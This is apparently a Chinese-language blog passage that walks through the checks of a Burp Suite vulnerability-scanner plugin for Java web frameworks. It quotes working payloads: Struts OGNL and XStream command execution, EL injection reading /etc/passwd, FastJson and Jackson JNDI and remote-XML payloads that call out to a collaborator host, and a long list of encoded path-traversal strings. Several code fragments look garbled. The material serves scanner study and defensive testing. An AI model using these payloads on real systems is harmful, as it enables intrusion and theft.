ExceptionRule

【3】Apache Struts 测试页面

判断struts是开发环境还是dev环境
Risk.Low

"".getBytes();
1

【4】Apache Tapestry 异常错误展示

Risk.Low

            byte[] tapestryException = "
An unexpected application exception has occurred.
".getBytes();
1

【5】Grails 异常错误展示

Risk.Low

            byte[] grailsException = "
Grails Runtime Exception
".getBytes();

1
2

【6】GWT 异常错误展示

Risk.Low

            byte[] gwtException = "com.google.gwt.http.client.RequestException".getBytes();
1

【7】java 常见的应用异常错误展示

Risk.Low

List<byte[]> javaxServletExceptions = Arrays.asList(
                    "javax.servlet.ServletException".getBytes(),
                    "οnclick=\"toggle('full exception chain stacktrace".getBytes(),
                    "at org.apache.catalina".getBytes(),
                    "at org.apache.coyote.".getBytes(),
                    "at org.jboss.seam.".getBytes(),
                    "at org.apache.tomcat.".getBytes(),
                    "".getBytes(),  // WAS
                    "The full stack trace of the root cause is available in".getBytes());
                    "
com.sun.facelets.FaceletException".getBytes(),
                    "Generated by MyFaces - for information on disabling".getBytes(),
                    "
            "/tresearch/", // JBuilder Apache Axis Admin Console
            "/"
    );
1
2
3
4
5
6
7
8
9
10
 
这些根目录加上admin目录请求
 
private static final String AXIS_ADMIN_PATH = "/axis2-admin/";
1
 
如果match到
 
    private static final byte[] GREP_STRING_AXIS_ADMIN = "".getBytes(),
            "".getBytes()
    );
1
2
3
4
 
则认为获取到了Service列表
 
【7】ApacheRollerOGNLInjection(表达式注入)-CVE-2013-4212
 
表达式注入
 
String EL_INJECTION_TEST = String.format("${%d*%d}", firstInt, secondInt);
1
 
攻击入口是登录页 url存在
 
if (curURL.getPath().contains("login.rol"))
1
 
去除所有参数
 
for (IParameter param : parameters) {
                rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
            }
1
2
3
 
新增攻击参数
 
rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                    callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL)
            );
1
2
3
 
如果从返回包中Match到上面的计算结果，则认为表达式注入成功。
 
【8】ApacheSolrXXE - CVE-2017-12629
 
payload
 
String xxesolr = "{!xmlparser v=''}";
1
 
%s用burp自带的dnslog接口
 
        IBurpCollaboratorClientContext collaboratorContext = callbacks.createBurpCollaboratorClientContext();
        String currentCollaboratorPayload = collaboratorContext.generatePayload(true);

1
2
3
 
发送请求
 
byte[] checkRequest = insertionPoint.buildRequest(xxePayload.getBytes());
IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), checkRequest);
1
2
 
match就看dns结果啦
 
【9】ApacheStrutsDebugMode（debug页面泄露）
 
先判断URL是不是java
 很粗，前面文章已经讲过了。
 
List notJ2EETechs = new ArrayList<>();
        notJ2EETechs.add("php");
        notJ2EETechs.add("asp");
        notJ2EETechs.add("cgi");
        notJ2EETechs.add("pl");

        return (!notJ2EETechs.contains(curExtension));
1
2
3
4
5
6
7
 
老样子
 去除所有入参
 
//Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }
1
2
3
4
 
新增参数，debug=console
 
rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL)
        );
1
2
3
 
如果返回包match
 
private static final byte[] GREP_STRING = "'OGNL Console'".getBytes();
1
 
则存在漏洞，表达式注入。
 看着像后门
 http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
 
 
【10】ApacheStrutsS2016(表达式注入)-(S2-016)
 
这里准备了两个payload
 
payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");
        payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");

1
2
3
 
一个是适配linux一个是windows
 简单看看payload语法
 
${
    #a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe','/c ipconfig.exe'})).start(),
    #b=#a.getInputStream(),
    #c=new java.io.InputStreamReader(#b),
    #d=new java.io.BufferedReader(#c),
    #e=new char[50000],
    #d.read(#e),
    #matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
    #matt.getWriter().println(#e),
    #matt.getWriter().flush(),
    #matt.getWriter().close()
    }	
1
2
3
4
5
6
7
8
9
10
11
12
 
对比看下正常java 调用java.lang.ProcessBuilder执行命令的实例
 
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
 
 
public class ProcessTest {
	public static void main(String args[]) {
		
		ProcessBuilder pb = new ProcessBuilder();
		pb.command(new String[] { cmd });
		try {
			Process process = pb.start();
			InputStream stdout = process.getInputStream();
			InputStreamReader isr = new InputStreamReader(stdout);
			BufferedReader br = new BufferedReader(isr);
			String line = null;
			while ( (line = br.readLine()) != null)
			System.out.println(line);
			int exitVal = process.waitFor();
			System.out.println(exitVal);
		} catch (IOException e) {
			e.printStackTrace();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	}
}


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
实际也就是增加了一个httprsp的回显，比较清晰
 上面的payload循环放到参数，如下参数都有可能存在漏洞
 
List<String> redirectMeth = new ArrayList();
        redirectMeth.add("action:");
        redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");
1
2
3
4
 
因为我们的payload希望是长成这样
 
redirect:xxxxx
1
 
所以要做一个替换，这里是因为前面只需要remove所有其他参数，剩下的第一个等于号应该是我们加入的这个参数和payload中间。
 
String utf8rawRequest = new String(rawrequest, "UTF-8");
modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes();
1
2
 
如果match到
 
 static {
        DETECTION_REGEX.add(Pattern.compile("Subnet Mask", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("uid=[0-9]+.*gid=[0-9]+.*", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("java\\.lang\\.(UNIX)", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

1
2
3
4
5
6
 
subnet mask是网关的意思，匹配的是win
 第三个没太理解，有可能是Win执行了linux的表达式抛出来的异常？
 
【11】ApacheStrutsS2017-S2-017
 
参数较016 少了redirect:
 
       redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");
1
2
 
payload
 
       rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                        callbacks.getHelpers().buildParameter(redir, "http://www.example.com/%23", IParameter.PARAM_URL)
                );

1
2
3
4
 
这里竟然没有恶意参数，知识一个跳转
 match返回的状态码和header头
 
  if (statusCode >= 300 && statusCode < 400) {
                          if (header.substring(header.indexOf(":") + 1).trim().startsWith("http://www.example.com/")) {

1
2
3
 
看起来s2 017就是个URL跳转
 https://www.cnblogs.com/jinqi520/p/10813737.html
 
 
【12】ApacheStrutsS2020 - S2-020
 
参数
 
modifiedRawRequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("Class.classLoader.URLs[0]",
                        classLoaderStringTest, IParameter.PARAM_URL)
        );
1
2
3
4
 
payload
 
long unixTime = System.currentTimeMillis() / 1000L;
        String classLoaderStringTest = "testClassloaderManipulation" + unixTime;
1
2
 
match返回包
 
    private static final Pattern CLASSLOADER_PM = Pattern.compile("Invalid field value for field|No result defined for action",

1
2
 
这个漏洞原理是支持使用classLoader
 可以看这篇
 struts自定义的classloadr
 
class.classLoader.resources.dirContext.docBase
1
 

 这里有两种绕过姿势
 
class[‘classLoader’]
Class.classloader
 问题正则
 
(.*\.|^)class\..*  两种都能绕过
(.*\.|^)(class|Class)(\.|\[).* 中括号可以绕过
1
2
 
安全正则
 
(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*
1
 
【13】ApacheStrutsS2032 - S2-032
 
老样子，去除所有参数
 
     byte[] rawrequest = baseRequestResponse.getRequest();
        //Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }
1
2
3
4
5
 
入参
 
method:
1
 
payload
 
%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.hook[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString
1
 
展开看看
 
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#kzxs.print(#parameters.hook[0]),
#kzxs.print(new java.lang.Integer(829+9)),
#kzxs.close(),1?
#xx:
#request.toString
1
2
3
4
5
6
7
 
第一步：从表达式上解释设置context中_memberAccess值为ognl.OgnlContext的属性DEFAULT_MEMBER_ACCESS的值.（SecurityMemberAccess 比较严格限制了反射类，DefaultMemberAccess不限制反射类），后面直接调用反射就行。
 其中hook[0]是后面的参数
 
modifiedRawRequest = callbacks.getHelpers().addParameter(modifiedRawRequest,
                    callbacks.getHelpers().buildParameter("hook", "HOOK_VAL", IParameter.PARAM_URL)
            );
1
2
3
 
match，因为print了俩，一个是HOOK_VAL，一个是表达式计算的值。
 
private static final Pattern DYNAMIC_METHOD_INVOCATION = Pattern.compile("HOOK_VAL838",
            Pattern.DOTALL | Pattern.MULTILINE);
1
2
 
【14】ApacheStrutsS2043 - S2-043（Config Browser插件泄露）
 
遍历path
 
private static final List<String> BROWSER_PATHS = Arrays.asList(
            "/config-browser/actionNames",
            "/config-browser/actionNames.action"
    );
1
2
3
4
 
请求之后match
 
private static final byte[] GREP_STRING = "".getBytes();
1
 
 
【15】ApacheStrutsS2052-S2-052
 
首先判断了有没有content-type
 
        String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");

1
2
 
毕竟payload要靠xml传过去
 增加content-type
 
        List<String> headersWithContentTypeXML = HTTPParser.addOrUpdateHeader(headers, "Content-type", "application/xml");

1
2
 
payload
 
String payload = " ping " + currentCollaboratorPayload;

        String xmlMarshallingBody= " +
            "  \n" +
            "    \n" +
            "      0\n" +
            "      \n" +
            "        \n" +
            "          \n" +
            "            \n" +
            "              \n" +
            "                false\n" +
            "                0\n" +
            "                \n" +
            "                  \n" +
            "                    \n" +
            "                    \n" +
            "                      \n" +
            "                        /bin/sh-c " + payload + "\n" +
            "                      \n" +
            "                      false\n" +
            "                    \n" +
            "                  \n" +
            "                  \n" +
            "                    \n" +
            "                      java.lang.ProcessBuilder\n" +
            "                      start\n" +
            "                      \n" +
            "                    \n" +
            "                    foo\n" +
            "                  \n" +
            "                  foo\n" +
            "                \n" +
            "                \n" +
            "              \n" +
            "              \n" +
            "              \n" +
            "              false\n" +
            "              0\n" +
            "              0\n" +
            "              false\n" +
            "            \n" +
            "            false\n" +
            "          \n" +
            "          \n" +
            "        \n" +
            "        0\n" +
            "      \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "  \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "";
        
    
        
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
 
这个payload和之前的有所不同，查一下漏洞原理：
 使用Struts2 REST插件的XStream组件反序列化操作没有校验。
 https://blog.csdn.net/qq_44312507/article/details/103585253
 match的话match
 collaboratorContext的接收值就行。
 
【16】ApacheStrutsShowcase
 
ApacheStrutsShowcase
 关键路劲
 
   private static final List<String> STRUTS_SHOWCASE_PATHS = Arrays.asList(
            "/struts2-showcase/showcase.action"
    );
1
2
3
 
如果match到
 
private static final byte[] GREP_STRING = "".getBytes();
1
 
则存在问题
 
看上去这个showcase.action在多个S2系列的漏洞中出现，比较容易出问题。
 https://www.anquanke.com/post/id/86757
 
【16】ApacheStrutsWebConsole
 
控制台路径
 
private static final List<String> STRUTS_WEBCONSOLE_PATHS = Arrays.asList(
            "/struts/webconsole.html?debug=console"
    );
1
2
3
 
如果match到
 
private static final byte[] GREP_STRING = "title>OGNL Console".getBytes();
1
 
则存在问题
 长这样
 
 但是有利用条件
 只有在开启了Debug模式且ClassPath中使用了struts2-dojo-plugin-*.jar的情况下，webconsole.html页面才有可能存在安全漏洞的风险。
 https://www.secpulse.com/archives/48383.html
 
【17】ApacheWicketArbitraryResourceAccess 目录穿越漏洞
 
路径包含
 
"wicket/resource")
1
 
payload则是替换掉上面的路径
 换成
 
    private static final List<String> PAYLOADS = Arrays.asList(
            "wicket/resource/int/wicket.properties,/bla/ HTTP",
            "wicket/resources/int/wicket.properties,/bla/ HTTP"
    );

1
2
3
4
5
 
这里采用的是替换原始请求包正则匹配
 
                byte[] wicketRequest = helpers.stringToBytes(plainRequest.replaceFirst("wicket\\/resource.*? HTTP", payload));

1
2
 
match则是
 
    private static final byte[] GREP_STRING = "initializer=".getBytes();

1
2
 
百度竟然没有找到相关漏洞解释
 去apache看看
 https://issues.apache.org/jira/browse/WICKET-4427
 看出来了，是目录穿越
 
public ExtensionResourceNameIterator(String path, final String extension)
    {
        if ((extension == null) && (path.indexOf('.') != -1))
        {
// Get the extension from the path provided
            extensions = new String[] { "." + Strings.lastPathComponent(path, '.') };
            path = Strings.beforeLastPathComponent(path, '.');
        }
        else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }
        else
        {
            extensions = new String[1];
            extensions[0] = ".";
        }

        this.path = path;
        index = 0;
    }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
注意这个分支
 
else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }
1
2
3
4
5
6
7
8
9
10
11
12
13
 
相当于根据,取了多个后缀然后拼接造成了路径穿越。
 
【18】EL3Injection EL 3.0/Lambda Injection EL表达式注入
 
payload
 
   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "System.getProperties()".getBytes()
    );            
     
1
2
3
4
 
直接post请求发过去
 
            byte[] checkRequest = insertionPoint.buildRequest(INJ_TEST);
            IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(
                    baseRequestResponse.getHttpService(), checkRequest);
1
2
3
 
match到
 
    private static final byte[] GREP_STRING = "java.vendor".getBytes();  
    
1
2
 
则存在漏洞
 这是直接执行命令？？
 match的是命令结果
 
 看了下文章
 
 不太现实，是指用户的输入直接传入了elp.eval执行
 
【19】ELInjection EL (Expression Language) Injection
 
payload
 
        byte[] EL_TEST = "(new+java.util.Scanner((T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\").getInputStream()),\"UTF-8\")).useDelimiter(\"\\\\A\").next()".getBytes();

1
2
 
拆分一下
 
a = T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\")
b = a.getInputStream()
c = new java.util.Scanner(b,utf)
d = c.useDelimiter(\"\\\\A\")
e = d.next()
1
2
3
4
5
 
match的话就matchpasswd，这个判断不好，既然都是exec，为何不用ping这种跨平台的命令或者echo。
 
第二中payload
 
     HashMap<byte[], byte[]> EL_INJECTIONS = new HashMap<byte[], byte[]>() {
            {
                put("${applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put("#{applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put(String.format("${%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("#{%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("{{%d*%d}}", firstInt, secondInt).getBytes(), multiplication.getBytes());
            }
        };

1
2
3
4
5
6
7
8
9
10
 
key是payload，value是响应包的match
 EL表达式
 https://xz.aliyun.com/t/7692
 
【20】FastJsonRCE CVE 2017-18349
 
payload
 
    // https://github.com/jas502n/fastjson-1.2.61-RCE
        List<String> PAYLOADS = new ArrayList<>();
        PAYLOADS.add("{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/obj\",\"autoCommit\":true}");
        PAYLOADS.add("{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://%s:80/ExportObject\"}");
        PAYLOADS.add("{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/ExportObject\",\"autoCommit\":true}}");
        PAYLOADS.add("{\"a\":{ \"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://%s:80/ExportObject\",\"autoCommit\":true}}");

1
2
3
4
5
6
7
 
记得改content-type
 
 String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");
        if (contentTypeHeader != null && !contentTypeHeader.contains("json")) {
1
2
 
match dnslog即可
 
collaboratorContext
1
 
分析看这个吧
 http://xxlegend.com/2018/10/23/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
 
【21】Htaccess - .htaccess泄露
 
这个也要做一个插件impl？
 请求"/.htaccess"; match private static final byte[] GREP_STRING = "RewriteEngin".getBytes();
 
【22】HTTPProxy
 
看着是比较老的洞了
 
 说是connect 协议走http协议，代理到其他网站就可以绕过https的限制
 发送
 
            byte[] rawrequestHTTPConnect = "CONNECT http://www.google.com/humans.txt HTTP/1.0\r\n\r\n".getBytes();

1
2
 
match
 
private static final byte[] GREP_STRING = "Google is built by a large".getBytes();
1
 
这国内没法检测，建议重写个http的链接。
 
【23】HTTPWeakPassword 弱口令
 
先判断返回包
 
        String wwwAuthHeader = getResponseHeaderValue(respInfo, "WWW-Authenticate");

1
2
 
是不是401
 
        if (responseCode == 401 && wwwAuthHeader != null) {

1
2
 
这个走的是之前提到的TOMCAT弱口令那个类
 
HTTPBasicBruteforce
credentials = wp.getCredentials();
1
2
 
 
【24】IDocInjection - CVE-2013-3770任意文件读取
 
Oracle IDoc 13年爆出的漏洞
 payload
 
   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "<$fileName=\"../../../../../../../../../../../etc/passwd\"$><$executeService(\"GET_LOGGED_SERVER_OUTPUT\")$><$ServerOutput$>".getBytes());

1
2
3
 
match
 
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

1
2
 
【25】InfrastructurePathTraversal 目录穿越绕waf
 
这个就是通用型的一个绕waf
 payload1
 
 private static final List<String> UTF8_LFI_PATHS = Arrays.asList(
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c",
            "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c",
            "/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\",
            "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af",
            "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/",
            "/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af",
            "/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af",
            "/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c",
            "/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\",
            "/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c",
            "/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\",
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/",
            "/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\",
            "/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../",
            "%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2",
            "/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "/static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "....//....//....//....//....//....//....//....//"
    );
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 
payload2
 
      {
            put("etc/passwd", Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("windows\\win.ini", Pattern.compile("for 16\\-bit app support", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        }
1
2
3
4
 
12拼接
 match的值在payload2里面
 
【26】JacksonDataBindCVE20177525
 
payload
 
        PAYLOADS.add("{\"param\":[\"org.springframework.context.support.FileSystemXmlApplicationContext\",\"http://%s/spel.xml\"]}");

1
2
 
match dnslog 就行
 
远程代码执行
 这个spel.xml内容里面可以自定义命令
 
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="
 http://www.springframework.org/schema/beans
 http://www.springframework.org/schema/beans/spring-beans.xsd
">
 <bean id="pb" class="java.lang.ProcessBuilder">
 <constructor-arg value="/Applications/Calculator.app/Contents/MacOS/Calculator" />
 <property name="whatever" value="#{ pb.start() }"/>
 </bean>
</beans>
1
2
3
4
5
6
7
8
9
10
 
【27】JavascriptSSRF - ReactJS SSRF
 
payload
 
String payload = "fetch('https://%s')";
1
 
match dnslog
 这个fetch 不仅仅可以打http协议的 file协议的也可以
 
【28】JavaServerFacesTraversal
 
payload
 
List<String> jsfTraversal = new ArrayList<>();
        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.jsf");
